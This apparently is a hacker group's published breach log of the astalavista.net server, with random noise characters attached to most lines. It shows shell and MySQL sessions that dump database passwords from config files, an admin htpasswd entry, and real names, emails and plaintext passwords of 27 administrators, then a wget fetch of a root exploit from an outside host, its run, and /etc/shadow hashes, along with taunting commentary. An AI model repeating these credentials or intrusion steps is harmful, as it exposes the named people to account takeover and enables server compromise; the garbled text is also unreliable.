# B5 T7 _+ c# f* D, `3 H3 h; V; d9 mdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend1 b- O" t; _- b+ E+ @3 D! v
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner+ P4 \; g; ~! G
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg# ^0 `: a7 s7 h
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
$ Y% j6 \2 |1 Mdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron) W9 d4 u* G( V) I
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
1 R7 x( B5 D. f0 X4 G-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php6 J6 S, m; n6 O% n1 K# T! v
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
1 g; S$ J) C+ _: Ddrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
7 `$ X; b% t) h5 X" ?drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour( _5 h) C5 v7 @* a
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess; U8 I' v" p. u- J) a1 M) ~
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
4 F" v3 K2 l& G" x# S" }-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
+ p) R4 H5 K2 D-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
) k, d- _; H( m8 z-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
& j/ [2 r* m) C-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php( y1 v8 d" K- w+ \
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf! D, ]8 v+ ?1 \# F+ c. _0 s9 Z* N
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc, {. M5 r0 I. _, b
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang% L& h% l1 A1 K% p
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib. j" H% T9 a# M: V$ k9 N+ M
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
% a- M4 f- t5 T! _& _2 Adrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member8 [: }3 ^0 m/ w% G. _) u
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata3 K5 ~- ? T' z+ W9 ?* g
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new9 A7 n1 U9 l% }: p
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf8 I/ ~- m% f) V* Q' @$ h9 C- H
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re, ?0 L0 Y) L3 P
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt$ y* ]5 X, x5 o& _. W9 L
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
8 l% M; \. s) y) E/ C7 F3 ydrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
; W) _; Y0 H# wdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
0 M) Y& b0 { z4 x+ U: adrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes& d' l% ?; D# |
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ T% {% C G/ @/ x
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl& T$ G/ T$ b( l9 u, m
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
8 B. c% [# Y& E- }2 j' ?1 m. K5 _- U# jdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old7 l( b1 `: R3 \
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php9 o x, l& v- q# P, R* E' R
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
c5 K' m+ U# y9 m# \9 {% ^% b$ K. }( G( [3 {- S$ e+ N
sh-3.2$ head -20 index.php' L* M2 [: K* ^' {, ]
<?PHP. w9 F$ t. Q2 M
/**, I! {$ V+ E$ r% [- k0 I- b
* Mainfile (external) for astalavistaNET v2.0
{' K0 C! B. G7 ?* B5 p/ n+ {* p2 x$ P: }" H) M# p! R0 r
* @copyright Astalavista IT Engineering GmbH( e6 u5 i- v4 w! l1 I
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch># \+ l5 S& ]9 F3 L8 U7 r
* @version 1.06 _1 T# D& v( w3 \; ]5 n
*/
) {' x; p" B* k" W
: J) B& U* T6 J3 ` if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
( T7 v8 m% w, s% M* _' E2 C% \ $dontStartSession = false;
5 |5 |) n, {8 s/ ?) ?1 O$ k } else {
3 m- W+ m% W4 x3 N* r- U $dontStartSession = true;# V/ t* _ F7 J, i
}" G2 R( h, V' _; q" }4 a0 q. H
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
# g! ?# Z# b% O6 j+ u. _/ c4 @$ p require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);( b9 Z$ R* i: w; j+ ]; x( n
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);7 \9 C) D, P. z- Q* d8 U; m
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
1 N! u7 g r9 E) T, m2 f) M, N. T" n: W$ d2 g
sh-3.2$ cd config5 X* ^$ U. R( N* p0 ~+ `4 z
sh-3.2$ ls -la
+ o. t2 Z/ w8 ]$ t4 v; V8 c% jtotal 32& W$ I, z$ T$ \6 }- G
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
5 [+ V/ z: `' i ~ bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 E' o5 r! {# \7 k7 g- v* x4 x-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php: K* n& ?8 u- q$ u1 E( C! w1 q. S
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php/ C! {/ [/ ?; _
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
a& `0 H# X2 V( m }9 {# W1 r-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
, u5 u5 ]1 C$ W( E. _& J6 ]-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
1 [2 q' F. d! O2 F2 N I. @/ N9 B, _- W. ^8 c; J) Q3 q+ R! B
sh-3.2$ cat com.conf.php" P. l, S7 h7 d2 A1 f$ h9 T* G
[snip]4 q; N1 {+ g; a8 C6 G; |
//member-database! O. }- d. q( D
$_CONFIG['db_mem_server'] = ‘localhost’;
, {0 g: o. s% [ F+ y3 u$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
$ T2 S) ~; P+ j* z5 L* e! T$_CONFIG['db_mem_user'] = ‘astanet_db’;
, \) C- x6 O$ r$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;0 ^6 @* t6 d( @5 A2 Z: f. d
$_CONFIG['db_mem_debug'] = false; //true or false
& d; G* J0 \( W2 @) U3 I; t//ads-database1 ^, U& V2 W: j7 f2 y' \8 g8 e
$_CONFIG['db_ads_server'] = ‘localhost’;" @6 `7 l& }9 R1 S/ g) s9 m. V, |
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
& n) I% W" `: X0 F$_CONFIG['db_ads_user'] = ‘astanet_db’;
5 _% W+ m/ ^* r: L* Y; i: E$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
5 Y2 m2 z0 L8 P6 C4 n' D$_CONFIG['db_ads_debug'] = false; //true or false
& i, t; ~4 {8 T( k3 R, L3 }! d//rainbow-database
; w, j9 K, m Q4 n! H5 s5 r8 o$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
7 b4 L0 u. z/ ]1 G$ L W8 [$ X4 X$_CONFIG['db_rainbow_database'] = ‘rainbow’;: j' R5 G& U* b& O. c" S
$_CONFIG['db_rainbow_user'] = ‘dinu’;9 g+ `4 H$ S+ T' }( [8 o0 }
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;5 G# |5 |, p6 M( v y- B
$_CONFIG['db_rainbow_debug'] = false; //true or false4 \8 L' \9 d: h) a+ p
//mailing lists database/ F0 G) @0 K B c
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
1 d6 ]/ X! Y# }% g! x4 r2 T4 h7 w$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
0 e: p7 x. m' V; f3 `' ]$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
0 C$ h, d5 z6 m4 j, d$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
0 V* o8 w) [" D; T8 }) ?8 s$_CONFIG['db_mailing_lists_debug'] = false; //true or false& y9 X6 G l" e' Y
//paypal& I$ \& t d8 a! B2 C
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;1 N( S" U& [/ T+ ]0 R) \
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;" ?* H& }* \$ m; I" _
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;. W- P6 x0 z" ~( F- c- }0 l+ h; Y
$_CONFIG['sub_pp_noship'] = ‘1′;7 c" h1 {# ~- G! Y
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;- `9 W5 f' }( i0 w) u& g( p
[snip]
, ~9 Q% v# }, E+ V
+ Y! t! _, ^; D+ l- A) qsh-3.2$ cd ..
8 S. N1 V$ ^- h9 J2 ]3 gsh-3.2$ cd member
8 L6 }# p! E+ n" Bsh-3.2$ ls -la
' k) x: k+ @* |$ ktotal 20
% {9 Y# {" w: q( F4 H; {drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
5 t0 y2 c3 R" r6 A- ~$ r( Hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% i6 y& }4 o2 {) S- z
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
# D1 e1 D9 j2 v' [9 {4 K( ^8 k-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php0 t! R; I# z* K+ E& d
sh-3.2$ cat .htaccess: u) {# \. H* N3 }# ~( p& u
SecFilterEngine off, |$ l \$ k* \/ E0 H
/ O( _: P4 L+ a& {3 ^2 s
sh-3.2$ cd ..
' z" K( G( d( {' | Rsh-3.2$ cd cron1 \& V) f7 S3 Z5 V* z& o
sh-3.2$ ls -la9 W C) \' |2 ?* E
total 168
$ n8 D5 O1 G, n9 m" W& o* Ldrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
, {5 _$ h% a0 N s1 h$ a% S0 b8 C! ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
. ~" B9 I+ v+ |1 t: L m( D3 ?9 \-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
5 }" M' H. ^1 `& U; b3 |-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
& c: E0 f, ^2 |- {4 J-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php1 o8 l# W2 L; g/ V0 s4 Z/ _
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php; x' H! Z/ ~0 R8 I3 B
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
* U b# e x5 a& E1 v4 E' }-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php' @' C" R) C6 C/ n, y. W Q7 ?& g) N
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
2 i) ^2 e' O! R- M7 h-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php3 k; \0 z4 Y2 E' @
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
6 Q+ K4 P8 s/ s, |+ ?+ `2 Q! S-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php% n/ m* M0 h! f; `9 r4 V
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php" p, H$ W! {0 a$ n7 g; h
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
1 A: G6 B4 @! z/ u3 n-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh$ P( ~0 ]" ~% b8 D" `" ?
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
- U& M0 g7 {. s1 H# c. [-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
; G( q; z$ Y0 h-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
+ q; O+ z$ B- O+ o5 P-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php, Y$ I* D/ b3 G) z: K8 E1 b
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php6 k+ G" R" ^! l# W+ _3 H: k
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email* L; Z' }/ q4 E) @5 E0 Q
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php4 }( k" V: @7 Y9 @( v" X. n
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php7 j p/ j0 l: h
+ ?' q* t8 c. V
sh-3.2$ cd ..# q6 e2 R) R& L0 Z
sh-3.2$ cd _007
5 w: @+ {1 z: A' S% a& Dsh-3.2$ ls -la( i& T# @9 V& l; K& @) }# B
total 24
+ O: x# n9 E) Q t& i1 M Ydrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .4 o, d) _) X4 X
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 z+ f3 i7 w( N# r. j2 c
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess& k: u8 u) x+ m: |; y
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php% s0 F/ j) D6 ^) p V# K
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
% V9 I+ D7 ^3 N" w& o8 v4 Z4 hdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap) V \1 H2 `6 n
3 \7 ?/ I/ l- Z. w" ish-3.2$ cat .htaccess, c! u2 L1 \2 `; k4 T
authType Basic! u+ |9 B1 r$ ]: [
authName Admin
* r8 o: J+ H; I+ l* I. Z: k- uauthUserFile /home/astanet/auth/.htadm_pwd- O ~! }' S3 O2 {
require valid-user
+ s/ H# W# D% U: l4 Z2 T3 a. t/ A2 I5 R0 W5 A; P
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
; A+ N& n& V Fadmin2net:CR0bl65MwhfT% w3 l7 U' b; M, l. s
% o6 a4 i5 i* R1 u6 O7 V9 b' X% Hsh-3.2$ mysql -u astanet_db -p
; a# x/ n" ]0 H+ i" K q6 q& v4 AEnter password:: h. K) s3 Z0 L7 g0 E. F2 X
Welcome to the MySQL monitor. Commands end with ; or \g.
; t: S, H* n! X( M0 UYour MySQL connection id is 275153
. Z* s+ x* r' q# d wServer version: 5.0.45-community-log MySQL Community Edition (GPL)# {8 |& B( `5 R
6 V- @* ?6 o2 t' B. {
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
8 I& c. a$ s; y8 L+ D, Q' d
# [! H c# K# R' Z" }2 Y7 [mysql> show databases;
9 D0 m) E& D% e' a }0 s+———————–+
, g2 y* ~) {8 p| Database |9 `) P3 W! W; t9 H; f. w
+———————–+
- h# {- W7 F( t J8 Z: M' y| information_schema |8 |5 ]4 S2 y, Y% O4 A+ S- G1 D9 r
| astanet_ads |# N+ ]" d2 t4 V3 O1 }
| astanet_mailing_lists |
$ [8 k' o( s5 z8 M| astanet_mediawiki |$ ]' z0 K6 n; G
| astanet_membersystem |' [8 |: G3 {& Y- c8 i: L5 S' |
| test |
r* p7 z6 O q7 O/ V; N; F+———————–+7 C" \# u4 P' U- D- u
6 rows in set (0.00 sec)0 `4 x9 n) r) W$ h6 `1 J' \, q C
4 `. G# }# Y( u1 l' ?
mysql> use astanet_membersystem3 U/ p! T5 C0 }7 E) h* ~
Database changed4 L$ f( D* O# g+ t% j9 p
mysql> show tables;
; I7 X2 E* H4 U- ]+———————————–+) s" O7 M1 O2 P4 r, |
| Tables_in_astanet_membersystem |. Y+ x7 N' Z6 I
+———————————–+
6 @. W0 ?- L e! C| blacklist_categories |- z6 |5 { j8 s0 Q* Y i) _: z2 C4 Q
| blacklist_content |0 B& S; b/ U, i# f
| blacklist_levels |$ y; s" n. F6 o
| blacklist_mcset |5 Y5 t6 O' v: b; S. l: h
| dir_categories |
! ]' N; u4 L6 _| dir_comments |
, q3 k8 f3 h& g" i" a# r, j| dir_links |
; D" o8 n; P1 Z6 e$ l8 h| dir_temp |
/ q- u$ Y$ q! Q; x$ a| dir_votes |0 O) e- x; |. m6 M) G
| documents |
, l9 L1 j" L2 S. v| documents_categories |/ h4 K" f* b% Z
| email_content |% W( D+ O2 h' E1 i1 h0 u
| email_settings |
3 C( w# l+ w- g) v: f2 S+ \| exploits |
4 i9 Q. A l1 |, \: v1 p| exploits_categories |# u: N/ u) ?1 U' t* w& h7 D0 e
| exploittree_categories |
! J) u' p$ j' v6 z9 X7 e2 A| exploittree_exploits |
9 n* \/ b% Z5 v3 ~| home_values |
6 R2 z# _/ k" H+ J| iso_countries |
g/ b: s8 v5 g. D, B| links_categories |
; W, g* n9 w. V1 n% g. ^- P3 ]% P| links_records |& B- a9 E' S( u$ k# Q6 F
| links_unauth |
# h q) e) T. [ T; a/ ?6 Q| links_votes |: v& N9 C$ @4 q5 ]8 I+ t9 P; u
| log |
1 n3 u" n5 `/ T L3 ^" [| news_categories |. w- Y; d. [, V- a* _
| news_comments |" _$ v" V, J+ F6 J) A
| news_emoticons |
3 x* s2 b: A+ N0 S# G" ~| news_latest |( H: o4 Q) @/ R6 g
| news_messages |
9 Z/ X+ A' y+ ?2 ]| news_statistics |- Y$ d0 y+ v N1 N
| news_votes |
& E" |6 V v; g0 A3 r; t, ?| prices_content |. G, e/ W: g! A: b; _' l4 R
| prices_offers |( n; C+ J/ @- G' j
| rss_settings |4 _' V% t( ~6 I, b# t/ q* ]" M
| sessions |( K9 J% ^" G4 y( X8 u
| stats_signups |( a/ i+ r; U2 t: B9 p
| u2u2 |1 \* T. Y- r7 f
| u2u_contact |
% ^# C3 R/ \' |" G6 P0 [# w| u2u_settings |9 O& K, L% U# e. [- k- A( {
| user_keywords_selected_categories |8 Z) V# r4 m4 p" }3 w6 R [5 \
| users |/ f7 S: p! a' M0 K
| users_ipn_test |
& e) Z0 D$ b$ w* i& ~7 t6 J5 f| users_keyword_values |. H4 s6 F, |5 B' [* N
| users_profile |$ M1 ~+ i: Q1 V, c9 e- k, z* P* T
| users_temp |9 Z" ~! f( n; [2 \
| users_upgrade |, d. Z; I! l9 P0 H' O& {
+———————————–+
! e7 F4 p: F# M f46 rows in set (0.00 sec)
' U/ r: N' ~: n) z2 r! d" {' b+ m. @ _
mysql> describe users;
) ^, P2 @5 E* L9 U+————————–+————————————–+——+—–+———————+—————-+
b/ V) d3 E2 Z0 o- z' Q| Field | Type | Null | Key | Default | Extra |
+ d1 v" S# C: G0 m' }+ L. G+————————–+————————————–+——+—–+———————+—————-+$ V- v& i4 `3 O# ? J
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
0 D% X$ s B$ O- J2 y| user | varchar(50) | NO | | | |
. _! [% D2 c( i& e| nickname | varchar(30) | NO | MUL | anonymous | |
( J( A) Q) \' o8 g| password | varchar(30) | NO | | | |
$ @2 L+ G" v2 H8 I| userlevel | tinyint(3) | YES | MUL | NULL | |5 U1 r8 [4 `9 M# t9 p" t
| exp | int(8) unsigned | NO | | 0 | |
2 R O+ l& a8 }* s0 E| email | varchar(50) | NO | | | |- d) U) o0 f0 Y* B z& t& M
| ip | varchar(15) | NO | | 0 | |
( u3 H9 Z5 p. t3 m; r3 H4 ~| proxy | set(’0′,’1′) | NO | | 0 | |
" h8 R. A& {( ?| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
j7 h) ]. N' I3 T* S| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
. ?$ R1 H% i0 ~$ G) T9 R! m4 E| anz_in | tinyint(1) | NO | | -1 | |8 W. ^: }* M: r( i- \$ Y9 k
| status | tinyint(1) unsigned | NO | | 0 | |
" u/ d7 M, R [| checked | set(’0′,’1′,’2′) | NO | | 0 | |
9 O6 V" U0 t, O" r| freemember | set(’0′,’1′) | NO | | 0 | |6 q" f* T/ v& l5 @! ^
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |. v" W- F; P% r( R, ]+ A) s, O- t
| lang | tinytext | NO | | | |
" T6 }9 i/ @9 O9 c8 |+ }2 || adid | smallint(6) | NO | | 0 | |% {9 F3 |' ^4 ]- f
| pp_txn_id | varchar(255) | YES | | NULL | |
8 K2 v, \- [4 d6 z( z# Z| cnb_transaction_id | varchar(255) | YES | | NULL | |% S; z) o/ K( ]. y6 G
| cnb_order_id | varchar(255) | YES | | NULL | |
( ?+ Q5 x9 [4 g( q Z| cnb_user_id | int(11) | YES | | 0 | |
6 N( }2 ?0 s4 V8 f- {+————————–+————————————–+——+—–+———————+—————-+
! ^4 j( z9 B& d8 W d22 rows in set (0.01 sec)! C! z1 k8 m8 Y
5 ~% B& s: z& `$ m& @$ a. V, s
mysql> select count(*) as skids from users;
2 ]8 Y6 o4 f# f1 s% V+ O7 m; `+——-+
5 v( Y$ ]4 X4 X" g/ H& }8 X- s% K: W O| skids |
4 j* i: ?/ g7 R) G+——-+* x- H; [9 w, s+ r# J
| 25199 |
, @! k9 O! h4 [- z# E+——-+2 ^. M R+ h% J7 _. I: C
1 row in set (0.00 sec)
# V+ j% m7 v. w, b* _( q5 z* H, B+ {
mysql> select user,nickname,password,email from users where userlevel = 1;6 J4 {" c6 Y2 v* \
+————————–+———————-+——————+———————————–+* d3 n3 G [! T" _
| user | nickname | password | email |2 s% `( W7 a, R# b
+————————–+———————-+——————+———————————–+/ L1 U, a3 i, }- l3 ]9 C
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
* P, v( o, I& h$ X* a. a& X, o| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
4 R- z( M$ H$ \; b/ V% w3 {| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |% W0 M2 i N8 J1 r8 U8 ?3 b9 \
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
( q r7 R! C- `| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
) i6 x0 S7 D( S: T; l& I6 K! r& T| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |- J$ V& f2 l K4 j5 w& \+ N# Y% Q
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |( F, p7 y' L* O4 H4 g
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |( n7 n5 |* J* |
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |2 O: F8 Y- x0 d0 L
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
) H3 g7 H# i* L" B, _" g| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
l( B1 M8 X- b& L. _5 T| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
7 q ^8 n3 F+ ^2 `| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
2 d" |/ T8 U) j0 x4 u/ e& p' x| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
% J. g; K7 J: _! V| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
5 ? X5 X6 ]2 s0 @0 `| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
0 n$ e+ v, O( y1 u0 f0 y| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
# V3 Y2 x9 ` P) z( p| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |/ `% W. P0 D/ Z# s* ~ U+ u! n/ ?
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
' M" x5 @/ b! K* X9 t4 S: r| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
# ^: a% A3 T, F+ Z| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |: R: k- m; N! X' ^% Z8 c
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |% k1 D# v) x" C+ Z8 r9 r5 n
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
) H( R \; F" b' [. E6 A8 R| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |' D8 d) b/ e. N& e2 c! p/ f
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
* `7 ^2 s7 S6 ?% _8 @9 b| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |. Y* d1 z- s8 T5 h8 T
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
6 X3 V) X( B, Y8 o1 h/ ]+————————–+———————-+——————+———————————–+
! I- T* b5 f' e! e! Y! S27 rows in set (0.00 sec)
+ ~/ M# l7 K0 n4 e9 B, Q8 H9 G3 |) ^/ }: _- k- ~9 t
mysql> exit;
4 m- C/ c8 k3 U4 ` [9 }& MBye5 [5 D$ M7 W( s# b. d
6 v% t4 z/ w7 ^4 X[~] plaintext passwords? yes,2 G* a" F& {' @( I- l0 Z/ i
Those so called “security professionals” who charge you $6.66 / month to& R6 t9 ^/ t: _' w1 i5 o4 b
register at their hack-proof portal, save your passwords in plaintext…% v' z, x( t: Q0 \/ C R
brilliant!
* p2 ?; d' Y+ C( a! ~! [8 J" @: q4 N% c# k+ T
[~] This been fun but we want more.
+ G6 J0 j5 R# }# {) j6 O# d3 u' L4 g6 b' e( g. O- s1 ?+ o7 `
sh-3.2$ uname -a! Y$ f1 }& B1 r- u) A1 O
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% r v1 s2 E4 y& }7 a( _' Osh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
' e9 y, z; e) @4 Z" |& x–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
" @" ~. I0 Y7 t8 k \Resolving anti.sec.labs… 13.33.33.37
( b, [' ^) L3 X: M+ Q4 @, ?Connecting to anti.sec.labs|13.33.33.37|:80… connected.
/ w4 R- f: ]. tHTTP request sent, awaiting response… 200 OK# v. g+ I- E% y: F
Length: 18200 (18K) [text/plain]
+ ?1 ^; N. W0 [% n4 | R& ?& ASaving to: `g0troot’4 D5 T6 n/ f$ V5 e
/ u% ^" ?4 x6 z+ g" [& u" @100%[=========================================================================================================================================>] 18,200 58.6K/s in1 v1 l4 c# X; w, J0 Q; ~
0.3s
2 Y9 M9 Q6 P7 }* q9 m* _) ?7 F5 N3 v i3 a! t) W
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]; r- v7 j) l. v" d0 w( q
1 O& N0 D8 R" j: F+ U( jsh-3.2$ ./g0troot -i x86_64
, l5 V0 M8 _2 Q[+] g0troot - anti.sec.labs
. I3 d8 B/ a! l: c[+] Target: 2.6.18-128.1.10.el5
- C8 Z, q8 Y5 V. p z! I- G[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]9 \& t8 f# E4 Y# e
" a+ ?. g m9 ~3 r/ \! u! p; m[+] r00tr00t. V9 k& N/ y' M2 z
[~] Executing shell…' r. M: x6 C' ]; {2 y$ D# L6 t
- p& z9 l5 ?' Y
sh-3.2# id
4 r+ Q2 A8 U- o0 x$ @" T xuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)* S, s/ G5 Y# ]' o) a) u
5 Y3 K; x8 }4 S6 s' Ksh-3.2# cat /etc/shadow
S, X) C d1 @root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::. y3 d" {- g7 [8 P4 |; z
[snip]
0 D7 C% T( w% [4 ~- S( Wadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::5 E1 m- j7 o& V5 e5 O/ H% q
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
" v" [2 t; o4 T% |* m0 k! vcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7::: J# r* r& P8 |. e
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
3 W: e. _. H: P. Q {: p' @) E* F
" k8 i; S: v ^sh-3.2# cat /etc/motd
+ N7 z; r9 e( s4 w9 z#####################################################* v; \/ F5 E! m0 y/ S/ I
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #& ^, e* j) V" p
# |__| [__ | |__| | |__| | | | [__ | |__| #
( l) R7 Q3 k& }% O1 Y# | | ___] | | | |___ | | \/ | ___] | | | #
